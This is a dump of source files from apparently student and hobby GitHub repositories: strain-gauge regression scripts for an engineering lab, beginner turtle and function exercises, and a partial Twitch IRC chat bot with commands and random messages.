[]\r\n hat_z_dir = np.array([np.cos((90 + deg) * np.pi / 180), np.sin(122.78 * np.pi / 180)])\r\n hat_y_dir = np.array([np.cos(deg * np.pi / 180), np.sin(32.78 * np.pi / 180)])\r\n\r\n centroid = 1e-2 * np.array([0.89, 1.39])\r\n hat_zs = [0] * len(sgs)\r\n for i in range(len(sgs)):\r\n hat_zs[i] = np.dot(hat_z_dir, sg_places[i] - centroid)\r\n\r\n for expr in [1, 2]:\r\n nd_dif = np.array(df_exprmnts[expr][['sg' + str(i) for i in sgs]])\r\n for i in range(4):\r\n nd_dif[i, :] = nd_dif[i + 1, :] - nd_dif[i, :]\r\n nd_dif = np.delete(nd_dif, -1, axis = 0)\r\n for i in range(4):\r\n # plt.plot(hat_zs, [j * 1e-6 * E - 800. / 81e-6 for j in nd_dif[i, :]])\r\n xs += [[i] for i in hat_zs]\r\n ys += [j * 1e-6 * E - 800. / 81e-6 for j in nd_dif[i, :]]\r\n\r\n clf = linear_model.LinearRegression()\r\n clf.fit(xs, ys)\r\n r2 = clf.score(xs, ys)\r\n mse = np.dot(clf.predict(xs) - ys, clf.predict(xs) - ys) / len(xs)\r\n # for i in range(len(xs)):\r\n # mse += (clf.predict(i) - ys) ** 2\r\n # mse /= len(xs)\r\n if deg == 32:\r\n print(clf.coef_, clf.intercept_, (800 / A - clf.intercept_) / clf.coef_)\r\n r2s += [r2]\r\n mses += [mse]\r\n\r\nprint(r2s)\r\nfig = plt.figure() \r\nax1 = fig.add_subplot(111)\r\nax1.plot(np.arange(1, 90), r2s)\r\nax2 = ax1.twinx()\r\nax2.plot(np.arange(1, 90), mses, 'y')\r\nax2.set_xlim([0, 90])\r\nax1.legend(['R^2'], loc = 2)\r\nax2.legend(['MSE'], loc = 1)\r\nplt.show()\r\n\r\n" }, { "alpha_fraction": 0.4509888291358948, "alphanum_fraction": 0.5133275985717773, "avg_line_length": 25.046510696411133, "blob_id": "e27357aadb3e4051b1e825fa24f08c07683afd95", "content_id": "477953985bd4a4e9b53b77311ff796785f12121b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2348, "license_type": "no_license", "max_line_length": 76, "num_lines": 86, "path": "/q3method2.py", "repo_name": "XieJiongyan/SJTU-EM341-experience2", "src_encoding": "UTF-8", "text": "import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\nfrom sklearn import linear_model \r\n\r\n# 由实验一得到的已知数据\r\nE = 214.6e9\r\nA = 81e-6\r\nI_y = 29.9e-6 * 9e-4\r\n# import data\r\ndf = pd.read_csv('input/data123.csv')\r\nexperiments = np.arange(1, 7)\r\ndf_exprmnts = [0] * 7\r\nnd_dif = [0] * 7\r\nsgs = np.arange(2, 13)\r\nfor expr in experiments:\r\n df_exprmnts[expr] = df[df['experiment'] == expr]\r\n nd_dif[expr] = np.array(df_exprmnts[expr][['sg' + str(i) for i in sgs]])\r\n for i in range(4):\r\n nd_dif[expr][i, :] = nd_dif[expr][i + 1, :] - nd_dif[expr][i, :]\r\n nd_dif[expr] = np.delete(nd_dif[expr], -1, axis = 0)\r\n\r\n print(nd_dif[expr])\r\n\r\nsg_shorts = [2, 3]\r\nsg_longs = [7, 8, 9]\r\nsg_short_places = [[0.02, 0], [0.005, 0]] \r\nsg_long_places = [[0,0.006],[0,0.026],[0, 0.046]] \r\n\r\ny_mids = []\r\nz_mids = []\r\nfor expr in [3, 4]:\r\n for itime in range(4): \r\n xs = []\r\n ys = []\r\n for i, sg in enumerate(sg_shorts):\r\n xs += [[sg_short_places[i][0]]]\r\n ys += [nd_dif[expr][itime, sg - 2] * 1e-6 * E]\r\n clf = linear_model.LinearRegression()\r\n clf.fit(xs, ys)\r\n # print(xs)\r\n print(ys)\r\n # print(type(clf.intercept_), - clf.intercept_ / clf.coef_[0])\r\n print(800 / A)\r\n print( clf.intercept_)\r\n y_mids += [(800 / A - clf.intercept_ )/ clf.coef_[0]]\r\n x2s = [] \r\n y2s = []\r\n for i, sg in enumerate(sg_longs):\r\n x2s += [[sg_long_places[i][1]]]\r\n y2s += [nd_dif[expr][itime, sg - 2] * 1e-6 * E]\r\n clf2 = linear_model.LinearRegression() \r\n clf2.fit(x2s, y2s)\r\n z_mids += [(800 / A - clf2.intercept_ )/ clf2.coef_[0]]\r\n\r\n\r\nprint(y_mids)\r\nprint(z_mids)\r\n\r\nprint(pd.Series(y_mids).describe())\r\nprint(pd.Series(z_mids).describe())\r\n\r\n# visualization\r\nplt.subplot(1, 2, 1)\r\nx = np.arange(0, 40, 1)\r\nk = clf.coef_ \r\nb = clf.intercept_\r\ny = x * k * 1e-3 + b - 800 / A\r\nplt.plot(x, y)\r\nplt.plot((800 / A - b )/ k / 1e-3, 0, 'r*')\r\nprint((800 / A - b )/ k / 1e-3)\r\n\r\nplt.grid()\r\n#\r\nplt.subplot(1, 2, 2)\r\nx = np.arange(0, 50, 1)\r\nk = clf2.coef_ \r\nb = clf2.intercept_\r\ny = x * k * 1e-3 + b - 800 / A\r\nplt.plot(x, y)\r\nplt.plot((800 / A - b )/ k / 1e-3, 0, 'r*')\r\nplt.xticks(np.arange(0, 51, 10))\r\nplt.grid()\r\n\r\nplt.show()\r\nprint((800 / A - b )/ k / 1e-3)\r\n" }, { "alpha_fraction": 0.5537848472595215, "alphanum_fraction": 0.5826693177223206, "avg_line_length": 21.952381134033203, "blob_id": "ddf792cd1187423e3c4c006c1635a58afc222005", "content_id": "0facc7f212266fd4470961aa2bb7e7fe8edbe55a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1004, "license_type": "no_license", "max_line_length": 60, "num_lines": 42, "path": "/q1method1.py", "repo_name": "XieJiongyan/SJTU-EM341-experience2", "src_encoding": "UTF-8", "text": "import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\n\r\nsg_xs = [2, 3, 5, 7, 8, 9, 11]\r\ncols = ['sg' + str(i) for i in sg_xs]\r\nprint(cols)\r\n\r\ndf = pd.read_csv('input/data123.csv')\r\n# print(df)\r\n# print(df[df['experiment'] == 1])\r\n# print(type(df['sg2']))\r\n\r\nexperiments = np.arange(1, 7)\r\ndf_exprmnts = [0] * 7\r\nprint(df_exprmnts)\r\nfor i in experiments:\r\n df_exprmnts[i] = df[df['experiment'] == i]\r\n # print(df_exprmnts[i])\r\n\r\nlst = df_exprmnts[5]['sg2'].tolist()\r\n\r\nprint(lst)\r\n\r\ndef print_a_sg(epsilon_sg):\r\n forces = [800 * i for i in np.arange(1, 7)]\r\n\r\ntotal_dif = []\r\nfor expr in [5, 6]:\r\n for sg in sg_xs:\r\n col_name = 'sg' + str(sg)\r\n epsilon_sg = df_exprmnts[expr][col_name].tolist()\r\n for i in range(4):\r\n total_dif += [epsilon_sg[i + 1] - epsilon_sg[i]]\r\n\r\nplt.bar(np.arange(0, len(total_dif)), total_dif)\r\n# plt.hist(total_dif)\r\n# plt.show()\r\ntotal_dif = pd.Series(total_dif)\r\n\r\nprint(total_dif)\r\nprint(total_dif.describe())" }, { "alpha_fraction": 0.5091220140457153, "alphanum_fraction": 0.5889395475387573, "avg_line_length": 25.015384674072266, "blob_id": "4e3c496547ad218fe71b971728b8552ccdad0970", "content_id": "d3f407368a02be544712b48f0ba4cf3d76608cef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1886, "license_type": "no_license", "max_line_length": 120, "num_lines": 65, "path": "/q1method2.py", "repo_name": "XieJiongyan/SJTU-EM341-experience2", "src_encoding": "UTF-8", "text": "import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\nfrom pylab import *\r\n\r\nsg_xs = [5, 11]\r\ncols = ['sg' + str(i) for i in sg_xs]\r\nprint(cols)\r\ndf = pd.read_csv('input/data123.csv')\r\n\r\nexperiments = np.arange(1, 7)\r\ndf_exprmnts = [0] * 7\r\nfor i in experiments:\r\n df_exprmnts[i] = df[df['experiment'] == i]\r\n\r\nlst1 = df_exprmnts[5]['sg5'].tolist()\r\nlst2 = df_exprmnts[6]['sg5'].tolist()\r\n\r\n#解决中文显示问题\r\nplt.rcParams['font.sans-serif'] = ['KaiTi'] # 指定默认字体\r\nplt.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题\r\n\r\ndef vis(lst1, lst2, ax):\r\n \r\n\r\n dif1 = np.array([0] * 4)\r\n dif2 = np.array([0] * 4)\r\n for i in range(4):\r\n dif1[i] = lst1[i + 1] - lst1[i]\r\n dif2[i] = lst2[i + 1] - lst2[i]\r\n ax2 = ax.twinx()\r\n bar_width = 0.4 * 800\r\n ax2.bar(np.arange(1200, 4001, 800) - bar_width / 2, dif1,width = bar_width, color = 'xkcd:sky blue', alpha = 0.65)\r\n ax2.bar(np.arange(1200, 4001, 800) + bar_width / 2, dif2,width = bar_width, color = 'y', alpha = 0.65)\r\n ax2.set_ylim(0, 100)\r\n ax2.legend(['试验一','试验二'])\r\n ax2.set_ylabel(r'每次加载增加的应变值$\\varepsilon$')\r\n\r\n ax.plot(np.arange(800, 4001, 800), lst1)\r\n ax.plot(np.arange(800, 4001, 800), lst2)\r\n ax.legend(['试验一','试验二'])\r\n ax.set_ylabel(r'应变值$\\varepsilon$')\r\n ax.set_xlabel(r'加载拉力($N$)')\r\n ax.set_xticks(np.arange(800, 4001, 800))\r\n\r\n print(pd.Series(list(dif1) + list(dif2)).describe())\r\n\r\n \r\n\r\n\r\n\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(121)\r\nvis(lst1, lst2, ax)\r\nax.set_title('应变片5')\r\n\r\nax3 = fig.add_subplot(122)\r\nlst1 = df_exprmnts[5]['sg11'].tolist()\r\nprint(lst1)\r\nlst2 = df_exprmnts[6]['sg11'].tolist()\r\nvis(lst1, lst2, ax3)\r\nax3.set_title('应变片11')\r\nsubplots_adjust(wspace = .5)\r\nplt.show()" }, { "alpha_fraction": 0.5085945129394531, "alphanum_fraction": 0.5429726839065552, "avg_line_length": 25.52777862548828, "blob_id": "78c9267227df10e9f95969e6e8eb6174558523fc", "content_id": "be243ec8b9bc47cf5b81ad53d701a10a3e335e87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 989, "license_type": "no_license", "max_line_length": 85, "num_lines": 36, "path": "/q1mu.py", "repo_name": "XieJiongyan/SJTU-EM341-experience2", "src_encoding": "UTF-8", "text": "import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\n\r\n# import data\r\ndf = pd.read_csv('input/data123.csv')\r\nexperiments = np.arange(1, 7)\r\ndf_exprmnts = [0] * 7\r\nnd_dif = [0] * 7\r\nsgs = np.arange(2, 13)\r\nfor expr in experiments:\r\n df_exprmnts[expr] = df[df['experiment'] == expr]\r\n nd_dif[expr] = np.array(df_exprmnts[expr][['sg' + str(i) for i in sgs]])\r\n for i in range(4):\r\n nd_dif[expr][i, :] = nd_dif[expr][i + 1, :] - nd_dif[expr][i, :]\r\n nd_dif[expr] = np.delete(nd_dif[expr], -1, axis = 0)\r\n\r\n print(nd_dif[expr])\r\n\r\n\r\nsg_xs = [2, 5, 8, 11]\r\nsg_ys = [4, 6, 10, 12]\r\n\r\nmus = []\r\nfor expr in [5, 6]:\r\n for i in range(4):\r\n sgx_name = (sg_xs[i] - 2)\r\n sgy_name = (sg_ys[i] - 2)\r\n for itime in range(4):\r\n mus += [ - nd_dif[expr][itime, sgy_name] / nd_dif[expr][itime, sgx_name]]\r\n # print(mus)\r\n\r\nprint(mus)\r\nplt.bar(np.arange(0, len(mus)), mus)\r\nplt.show()\r\nprint(pd.Series(mus).describe())" } ]
6
crookescout/unit3
https://github.com/crookescout/unit3
6ecacf70ba540dcdd923036e88accc1b79738f9a
8e549a6b3593137f0aec6b9e62f597f2fa726fdf
2c6ea39881febfab6c04e6a94b878193f6620bac
refs/heads/master
2020-08-02T13:30:19.088397
2019-10-25T13:17:45
2019-10-25T13:17:45
211,369,863
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5548561215400696, "alphanum_fraction": 0.6393885016441345, "avg_line_length": 12.899999618530273, "blob_id": "5a2f0acf133114a8be4c6565072d9ae4e0596353", "content_id": "04a9974b2efc1888f902994f25c30c97a7c04539", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1112, "license_type": "no_license", "max_line_length": 66, "num_lines": 80, "path": "/letters.py", "repo_name": "crookescout/unit3", "src_encoding": "UTF-8", "text": "# Scout Crooke, 9/26/19, this program uses letters to spell MISSISSIPPI\n\nimport turtle\nturtle.speed(0)\nturtle.pencolor(\"purple\")\nturtle.pensize(2)\n\nturtle.penup()\nturtle.back(300)\nturtle.pendown()\n\n\ndef make_m():\n turtle.left(90)\n turtle.fd(100)\n turtle.right(120)\n turtle.fd(50)\n turtle.left(60)\n turtle.fd(50)\n turtle.right(120)\n turtle.fd(100)\n\n\nmake_m()\n\nturtle.penup()\nturtle.left(90)\nturtle.forward(10)\nturtle.pendown()\n\n\ndef make_i():\n turtle.fd(28)\n turtle.left(180)\n turtle.fd(14)\n turtle.right(90)\n turtle.fd(100)\n turtle.left(90)\n turtle.fd(14)\n turtle.left(180)\n turtle.fd(28)\n\n\nmake_i()\n\nturtle.penup()\nturtle.forward(80)\nturtle.pendown()\n\n\n\ndef make_s():\n turtle.left(140)\n turtle.fd(30)\n turtle.left(80)\n turtle.fd(30)\n turtle.left(50)\n turtle.fd(40)\n turtle.left(70)\n turtle.fd(45)\n turtle.right(70)\n turtle.fd(40)\n turtle.right(65)\n turtle.fd(30)\n turtle.right(55)\n turtle.fd(30)\n\n\nmake_s()\n\nturtle.penup()\nturtle.right(120)\nturtle.fd(200)\nturtle.right(50)\nturtle.pendown()\n\nmake_s()\n\n\nturtle.exitonclick()\n" }, { "alpha_fraction": 0.6368653178215027, "alphanum_fraction": 0.6445916295051575, "avg_line_length": 23.5, "blob_id": "ed17b68f6a1bfa77ff3932519445cc258ebe1204", "content_id": "14b219d7fb76cac2da6475350869072682b5f64e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1812, "license_type": "no_license", "max_line_length": 114, "num_lines": 74, "path": "/assignment_option3.py", "repo_name": "crookescout/unit3", "src_encoding": "UTF-8", "text": "# Scout Crooke, 10/1/19, This program draws a hexagon flower\n\nimport turtle\n\n\ndef get_side_length():\n \"\"\"\n this function gets the length of a side of the hexagon from the user\n :return: integer value of the side length\n \"\"\"\n return int(input(\"What is the length of a side of the hexagon?\"))\n\n\ndef get_center_color():\n \"\"\"\n this function gets the color of the center of the flower from the user\n :return: string value of the color of the center of the flower\n \"\"\"\n return input(\"What is the color of the center of the flower?\")\n\n\ndef get_petal_color():\n \"\"\"\n this function gets the color of the flower petals from the user\n :return: string value of the color of the flower petals\n \"\"\"\n return input(\"What is the color of the flower petal?\")\n\n\ndef make_hexagon(color, length):\n \"\"\"\n this function draws the center of the flower using the given color and length\n :param color:\n :param length:\n :return: none\n \"\"\"\n turtle.color(color)\n turtle.begin_fill()\n for x in range(6):\n turtle.forward(length)\n turtle.right(60)\n turtle.end_fill()\n\n\ndef make_petals(color, length):\n \"\"\"\n this function draws the petal of the flower using the given color and length. It is needed because, otherwise,\n it would draw over the same hexagon over and over\n :param color:\n :param length:\n :return: none\n \"\"\"\n turtle.color(color)\n turtle.begin_fill()\n for x in range(6):\n turtle.fd(length)\n turtle.left(60)\n turtle.end_fill()\n\n\ndef main():\n length = get_side_length()\n center = get_center_color()\n petal = get_petal_color()\n make_hexagon(center, length)\n for x in range(6):\n turtle.fd(length)\n turtle.right(60)\n make_petals(petal, length)\n\n\nmain()\n\nturtle.exitonclick()" }, { "alpha_fraction": 0.5458996295928955, "alphanum_fraction": 0.5605875253677368, "avg_line_length": 13.333333015441895, "blob_id": "02b8c10965c30578d71cf74c48c3e685bad09699", "content_id": "cd47a8743230b80e25d32705a83243e1ebc09afc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 817, "license_type": "no_license", "max_line_length": 69, "num_lines": 57, "path": "/daily_exercises.py", "repo_name": "crookescout/unit3", "src_encoding": "UTF-8", "text": "# By Scout Crooke, 9/25/29, this program works on daily function exercises\n\n\ndef make_hexagon_top():\n print(\" ________\")\n print(\" / \\\\\")\n print(\"/ \\\\\")\n\n\ndef make_haxagon_bottom():\n print(\"\\\\ /\")\n print(\" \\\\________/\") \\\n\n\n\ndef make_punctuation():\n print(\" _\\\"_\\'_\\\"_\\'_\\\"_\")\n\n\nmake_hexagon_top()\nmake_haxagon_bottom()\nmake_punctuation()\nmake_hexagon_top()\nmake_haxagon_bottom()\nmake_punctuation()\nmake_haxagon_bottom()\nmake_hexagon_top()\nmake_punctuation()\nmake_haxagon_bottom()\n\n\ndef happy_bd_ty():\n print(\"Happy Birthday to you\")\n\n\ndef happy_bd_db(name):\n print(\"Happy Birthday dear\", name)\n\n\nfor x in range(2):\n happy_bd_ty()\n\nhappy_bd_db(\"Brian\")\nhappy_bd_ty()\n\n\ndef plus(x, y):\n return x + y\n\n\ndef main():\n plus(8, 9)\n plus(6, 5)\n plus(2, 4)\n\n\nmain()\n" }, { "alpha_fraction": 0.6010362505912781, "alphanum_fraction": 0.6113989353179932, "avg_line_length": 31.16666603088379, "blob_id": "cb4212894c4f028722c1649f6d92f0fc73fbbb1e", "content_id": "795efb9156e739cd2e362ead42f46148c0bfb45e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 579, "license_type": "no_license", "max_line_length": 120, "num_lines": 18, "path": "/triangle.py", "repo_name": "crookescout/unit3", "src_encoding": "UTF-8", "text": "# Scout Crooke, 9/26/19, this program calculates the area of a triangle given the length of its three sides\n\nimport math\n\n\ndef area_of_triangle(a, b, c):\n s = (a + b + c) / 2\n area = math.sqrt(s * (s - a) * (s - b) * (s - c))\n return area\n\n\nside_a = float(input(\"What is the length of side a?\"))\nside_b = float(input(\"What is the length of side b?\"))\nside_c = float(input(\"What is the length of side c?\"))\n\na = area_of_triangle(side_a, side_b, side_c)\n\nprint(\"The area of a triangle with side lengths\", str(side_a) + \",\", str(side_b) + \",\", \"and\", str(side_c), \"equals\", a)\n" } ]
4
Hiauk/Metroidvania
https://github.com/Hiauk/Metroidvania
b01c4c79194ef9d283e3251433f51f4f8a424d2a
65c9bf47de7d12be4e8d565dde6fdb8850feddc7
2dfdd2443eadc8fb64020c1d73a2af8a9b3abb5d
refs/heads/master
2020-02-07T19:19:38.465058
2017-08-23T18:37:05
2017-08-23T18:37:05
99,319,831
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5054048895835876, "alphanum_fraction": 0.5164043307304382, "avg_line_length": 33.464054107666016, "blob_id": "16371a1d170c36a41445dfb567457646e309f0b6", "content_id": "3adca07695f34b579e616abcc135f4b2842cdd8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5273, "license_type": "no_license", "max_line_length": 128, "num_lines": 153, "path": "/sprites.py", "repo_name": "Hiauk/Metroidvania", "src_encoding": "UTF-8", "text": "import pygame as pg\nfrom settings import *\nvec = pg.math.Vector2\n\nclass Player(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = pg.Surface((TILESIZE, TILESIZE*2))\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.vel = vec(0, 0)\n self.pos = vec(x, y) * TILESIZE\n self.standing = False\n self.jumping = False\n self.jump_offset = 0\n self.jump_height = 40\n self.crouching = False\n self.direction = 1\n\n def get_keys(self):\n self.vel = vec(0, 0)\n keys = pg.key.get_pressed()\n if keys[pg.K_LEFT] or keys[pg.K_a]:\n self.vel.x = -PLAYER_SPEED\n self.direction = 3\n if keys[pg.K_RIGHT] or keys[pg.K_d]:\n self.vel.x = PLAYER_SPEED\n self.direction = 1\n if keys[pg.K_UP] or keys[pg.K_w]:\n self.direction = 4\n if keys[pg.K_DOWN] or keys[pg.K_s]:\n self.direction = 2\n if self.vel.x != 0 and self.vel.y != 0:\n self.vel *= 0.7071\n\n def collide_with_walls(self, dir):\n if dir == 'x':\n hits = pg.sprite.spritecollide(self, self.game.walls, False)\n if hits:\n if self.vel.x > 0:\n self.pos.x = hits[0].rect.left - self.rect.width\n if self.vel.x < 0:\n self.pos.x = hits[0].rect.right\n self.vel.x = 0\n self.rect.x = self.pos.x\n if dir == 'y':\n hits = pg.sprite.spritecollide(self, self.game.walls, False)\n if hits:\n if self.vel.y > 0:\n self.pos.y = hits[0].rect.top - self.rect.height\n self.standing = True\n if self.vel.y < 0:\n self.pos.y = hits[0].rect.bottom\n self.jumping = False\n self.jump_offset = 0\n self.vel.y = 0\n self.rect.y = self.pos.y\n else:\n self.standing = False\n\n def jump(self):\n if self.standing == True:\n self.standing = False\n self.jumping = True\n\n def shoot(self):\n self.bullet = Bullet(self.game, self.pos.x + (self.rect.width / 2), self.pos.y + (self.rect.height / 2), self.direction)\n\n def crouch(self):\n if self.crouching == False:\n self.image = pg.Surface((TILESIZE, TILESIZE))\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.pos.y += TILESIZE\n self.crouching = True\n else:\n self.image = pg.Surface((TILESIZE, TILESIZE*2))\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.pos.y -= TILESIZE\n self.crouching = False\n\n def update(self):\n self.get_keys()\n if self.jumping == True:\n if self.jump_offset < self.jump_height:\n self.vel.y -= 300 - (self.jump_offset*2)\n self.jump_offset += 1\n else:\n self.jumping = False\n self.jump_offset = 0\n else:\n self.vel.y += 500\n self.pos += self.vel * self.game.dt\n self.rect.x = self.pos.x\n self.collide_with_walls('x')\n self.rect.y = self.pos.y\n self.collide_with_walls('y')\n\nclass Wall(pg.sprite.Sprite):\n def __init__(self, game, x, y, walltype):\n self.groups = game.all_sprites, game.walls\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.type = walltype\n imagefile = ''\n #self.image = pg.image.load('images/block.png')\n if self.type == '1':\n imagefile = 'images/spiral.png'\n elif self.type == '2':\n imagefile = 'images/solid.png'\n elif self.type == '3':\n imagefile = 'images/stripes1.png'\n else:\n imagefile = 'images/wall1.png'\n self.image = pg.image.load(imagefile)\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.rect.x = x * TILESIZE\n self.rect.y = y * TILESIZE\n\nclass Bullet(pg.sprite.Sprite):\n def __init__(self, game, x, y, direction):\n self.groups = game.all_sprites, game.bullets\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = pg.Surface((8,8))\n self.image.fill(BLACK)\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.rect.x = x\n self.rect.y = y\n self.speed = 400\n self.direction = direction\n\n def update(self):\n if self.direction == 1:\n self.rect.x += self.speed * self.game.dt\n elif self.direction == 2:\n self.rect.y += self.speed * self.game.dt\n elif self.direction == 3:\n self.rect.x -= self.speed * self.game.dt\n elif self.direction == 4:\n self.rect.y -= self.speed * self.game.dt\n if pg.sprite.spritecollide(self, self.game.walls, False):\n self.kill()\n\n def collision_check(self):\n return pg.sprite.spritecollide(self, self.game.walls, False)\n" }, { "alpha_fraction": 0.47772276401519775, "alphanum_fraction": 0.6435643434524536, "avg_line_length": 20.210525512695312, "blob_id": "9db0839fc4c370c7c64a6c50abbff4b6d2d03faf", "content_id": "614bc973e1704b536d053025467c48efbe332372", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 404, "license_type": "no_license", "max_line_length": 45, "num_lines": 19, "path": "/settings.py", "repo_name": "Hiauk/Metroidvania", "src_encoding": "UTF-8", "text": "# define some colors (R, G, B)\nWHITE = (255, 255, 255)\nBLACK = (31, 31, 31)\nDARKGREEN = (77, 83, 61)\nLIGHTGREEN = (139, 148, 111)\n\n# game settings\nWIDTH = 480 # 16 * 64 or 32 * 32 or 64 * 16\nHEIGHT = 360 # 16 * 48 or 32 * 24 or 64 * 12\nFPS = 60\nTITLE = \"Tilemap Demo\"\nBGCOLOR = DARKGREEN\n\nTILESIZE = 32\nGRIDWIDTH = WIDTH / TILESIZE\nGRIDHEIGHT = HEIGHT / TILESIZE\n\n#player settings\nPLAYER_SPEED = 300\n\n" } ]
2
DominicMuckzZ/Twitch-Bot-Interface
https://github.com/DominicMuckzZ/Twitch-Bot-Interface
59554c8c0961b1a04ad21dba7571783b6e0cc6d4
59685a320a941d93118bc6ece09328aab844e0f6
d42b64266edfe1d34063f063dc23f497691a483c
refs/heads/main
2023-04-24T23:46:56.281863
2021-05-06T20:54:41
2021-05-06T20:54:41
364,979,024
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.565960168838501, "alphanum_fraction": 0.5783265829086304, "avg_line_length": 37.022315979003906, "blob_id": "884d8fcb6b711e95d4120922a975d5e57519422b", "content_id": "e53884df085c2bcecbcdd3f93eb9f0cb9350f01d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27979, "license_type": "no_license", "max_line_length": 137, "num_lines": 717, "path": "/main.py", "repo_name": "DominicMuckzZ/Twitch-Bot-Interface", "src_encoding": "UTF-8", "text": "import tkinter as tk\r\nimport tkinter.ttk as ttk\r\nimport tkinter.messagebox as messagebox\r\nimport tkinter.simpledialog as simpledialog\r\n\r\nfrom threading import Thread\r\nimport pickle\r\nimport datetime\r\nimport socket\r\nimport json\r\nimport requests\r\nimport random\r\nimport re\r\n\r\nclass command():\r\n def __init__(self,name,description,output,active,lastUsed,userLevel,cooldown=5):\r\n self.name = name\r\n self.description = description\r\n self.output = output\r\n self.active = active\r\n self.lastCalled = lastUsed\r\n self.userLevel = userLevel\r\n self.cooldown = cooldown\r\n\r\n def isCooleddown(self):\r\n if self.lastCalled == None or self.lastCalled <= datetime.datetime.now() - datetime.timedelta(minutes=int(self.cooldown)):\r\n return True\r\n return False\r\n \r\n def getValues(self):\r\n active = u\"\\u274C\"\r\n if self.active:\r\n active = u\"\\u2713\"\r\n return (active,self.name,self.description,self.output,self.userLevel)\r\n\r\n def getOutput(self):\r\n return self.output\r\n\r\n def isActive(self):\r\n return self.active\r\n \r\n def invertActive(self):\r\n self.active = not(self.active)\r\n\r\n def getUserLevel(self):\r\n return [\"viewer\",\"moderator\",\"broadcaster\"].index(self.userLevel)\r\n\r\nclass message():\r\n def __init__(self,message):\r\n self.active = True\r\n self.message = message\r\n\r\n def getValues(self,index):\r\n active = u\"\\u274C\"\r\n if self.active:\r\n active = u\"\\u2713\"\r\n return (index,active,self.message)\r\n\r\n def getOutput(self):\r\n return self.message\r\n\r\n def isActive(self):\r\n return self.active\r\n \r\n def invertActive(self):\r\n self.active = not(self.active)\r\n\r\nHOST = \"irc.twitch.tv\"\r\nPORT = 6667\r\ntry:\r\n botInfo = pickle.load(open(\"botCredentials.p\",\"rb\"))\r\n CHAN = botInfo[\"CHAN\"]\r\n NICK = botInfo[\"NICK\"]\r\n PASS = botInfo[\"PASS\"]\r\n RMIT = botInfo[\"RMIT\"]\r\n AMES = botInfo[\"AMES\"]\r\n EMES = botInfo[\"EMES\"]\r\nexcept:\r\n CHAN = \"#\"\r\n NICK = \"\"\r\n PASS = \"\"\r\n RMIT = True\r\n AMES = False\r\n EMES = 50\r\n\r\ntry:\r\n callableCommands = pickle.load(open(\"CommandsList.p\",\"rb\"))\r\nexcept Exception as e:\r\n print(e)\r\n callableCommands = {}\r\ntry:\r\n randomMessages = pickle.load(open(\"randomMessages.p\",\"rb\"))\r\nexcept Exception as e:\r\n print(e)\r\n randomMessages = []\r\n\r\ncross = u\"\\u274C\"\r\ntick = u\"\\u2713\"\r\nmoderators = []\r\n \r\nclass Bot():\r\n def __init__(self):\r\n self.connected = False\r\n self.connection = None\r\n self.thread = None\r\n self.botApplication = None\r\n self.viewerList = []\r\n self.rmIndex = 0\r\n\r\n def startConnection(self,botApplication):\r\n self.connected = True\r\n self.botApplication = botApplication\r\n self.thread = Thread(target=self.connectToChannel)\r\n self.thread.daemon = True\r\n self.thread.start()\r\n\r\n def stopConnection(self):\r\n self.connection = False\r\n try:\r\n self.thread.stop()\r\n except:\r\n pass\r\n\r\n def sendRandomMessage(self):\r\n randomMessageList = self.getActiveRM()\r\n if len(randomMessageList) > 0:\r\n if self.botApplication.iterateRM:\r\n outgoingMessage = randomMessageList[self.rmIndex]\r\n self.rmIndex += 1\r\n if self.rmIndex >= len(randomMessageList):\r\n self.rmIndex = 0\r\n else:\r\n outgoingMessage = random.choice(randomMessageList)\r\n self.sendMessage(CHAN,outgoingMessage.getOutput())\r\n\r\n def getModerators(self):\r\n link = f\"http://tmi.twitch.tv/group/user/{self.CHAN.replace('#','')}/chatters\"\r\n r = requests.get(link)\r\n modsJson = r.json()\r\n \r\n return modsJson[\"chatters\"][\"moderators\"]\r\n \r\n def connectToChannel(self):\r\n self.CHAN = self.botApplication.channelName.get()\r\n self.NICK = self.botApplication.nickEntry.get()\r\n self.PASS = self.botApplication.oauthEntry.get()\r\n self.connection = socket.socket()\r\n self.connection.connect((HOST,PORT))\r\n\r\n self.sendPass()\r\n self.sendNick()\r\n self.joinChannel()\r\n\r\n data = \"\"\r\n messageCount = 0\r\n try:\r\n while self.connected:\r\n data = data+self.connection.recv(1024).decode('UTF-8')\r\n\r\n data_split = re.split(r\"[~\\r\\n]+\", data)\r\n data = data_split.pop()\r\n \r\n for line in data_split:\r\n line = str.rstrip(line)\r\n line = str.split(line)\r\n\r\n if line == [':tmi.twitch.tv', 'NOTICE', '*', ':Login', 'authentication', 'failed']:\r\n raise ConnectionAbortedError\r\n\r\n if len(line) >= 1:\r\n if line[0] == 'PING':\r\n 